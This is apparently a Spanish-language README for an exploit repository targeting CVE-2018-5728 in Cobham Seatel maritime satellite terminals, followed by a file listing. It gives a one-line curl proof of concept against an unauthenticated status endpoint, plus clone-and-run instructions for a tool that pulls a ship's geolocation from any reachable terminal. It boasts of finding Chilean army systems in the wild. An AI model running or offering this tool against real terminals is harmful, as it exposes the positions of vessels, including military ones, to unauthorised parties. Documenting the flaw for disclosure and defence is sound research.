[CVE-2018-5728] Terminal Satelitales Seatel exponen geolocalización # Terminales Seatel
Las embarcaciones que ocupan la plataforma satelital Seatel (de la firma Cobham), cuenta con una serie de vulnerabilidades sobre los servicios de la misma terminal, que podría permitir fácilmente a terceros no autorizados entre otras cosas conocer su geolocalización.

# [Exploit] Terminales Seatel
[*] Exploit Title: "Sensitive exposure from Seatel satellite terminal"
[*] CVE: CVE-2018-5728
[*] CVSS Base Score v3: 7.1 / 10
[*] CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
[*] Exploit Author: Fernandez Ezequiel ( twitter:@capitan_alfa )
### Simple PoC:
```
$> curl "http://<seatel_host>:<port>/cgi-bin/getSysStatus"
```
## In the Wild:

# TOOL: "Seatel exposed ship"
## Quick start
usr@pwn:~$ git clone https://github.com/ezelf/seatel_terminals.git
usr@pwn:~$ cd seatel_terminals
Usr@pwn:~$ python seaTel.py --host <host>
## help
usage: seaTel.py [-h] [-v] --host HOST [--port PORT]
[+] Where are you ship ?
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port (default 80)
usr@pwn:~$ python seaTel.py --host <host>
## Pocs (Output) :


### Extra: CHILE ARMY !!!


### Blog:
https://misteralfa-hack.blogspot.com/2019/08/cobham-terminales-satelitales-seatel.html
I see you... ! xd
[4.0K] /data/pocs/ad62f6734459abac7f310b3e1337fa6837578435
├── [4.0K] img
│ ├── [ 62K] 2.jpg
│ ├── [ 31K] 4.jpeg
│ ├── [ 65K] home.png
│ ├── [ 34K] home_sat.png
│ ├── [ 47K] poc_1_.png
│ ├── [ 50K] poc_tool_1.png
│ ├── [ 33K] poc_tool_2.png
│ ├── [ 64K] Radomos.jpg
│ ├── [ 12K] seatel-cobham-logo.png
│ └── [ 99K] shodan_poc_1.png
├── [1.6K] README.md
└── [3.7K] seatelTerms.py
1 directory, 12 files